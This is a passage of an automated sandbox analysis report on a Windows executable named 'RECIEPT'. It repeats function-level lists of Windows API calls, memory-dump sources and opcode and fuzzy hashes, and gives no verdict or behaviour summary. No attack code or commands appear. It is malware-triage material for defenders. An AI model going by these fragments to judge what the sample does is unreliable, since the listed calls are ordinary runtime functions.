                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Proc$Parent
                                        • String ID:
                                        • API String ID: 2351499541-0
                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                        • TranslateMessage.USER32(?), ref: 00442B01
                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchTranslate
                                        • String ID:
                                        • API String ID: 1795658109-0
                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                        • GetCaretPos.USER32(?), ref: 004743B2
                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                        • GetForegroundWindow.USER32 ref: 004743EE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                        APIs
                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                        • _wcslen.LIBCMT ref: 00449519
                                        • _wcslen.LIBCMT ref: 00449526
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen$_wcspbrk
                                        • String ID:
                                        • API String ID: 2886238975-0
                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __setmode$DebugOutputString_fprintf
                                        • String ID:
                                        • API String ID: 1792727568-0
                                        • Opcode ID: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                        • Opcode Fuzzy Hash: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                        APIs
                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                        APIs
                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                        • String ID: cdecl
                                        • API String ID: 3850814276-3896280584
                                        • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                        • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                        APIs
                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                        • _memmove.LIBCMT ref: 0046D475
                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 2502553879-0
                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                        APIs
                                        • SendMessageW.USER32 ref: 00448C69
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                        APIs
                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorLastacceptselect
                                        • String ID:
                                        • API String ID: 385091864-0
                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$CreateMessageObjectSendShowStock
                                        • String ID:
                                        • API String ID: 1358664141-0
                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 0043392E
                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                        • __wsplitpath.LIBCMT ref: 00433950
                                        • __wcsicoll.LIBCMT ref: 00433974
                                        • __wcsicoll.LIBCMT ref: 0043398A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                        • String ID:
                                        • API String ID: 1187119602-0
                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
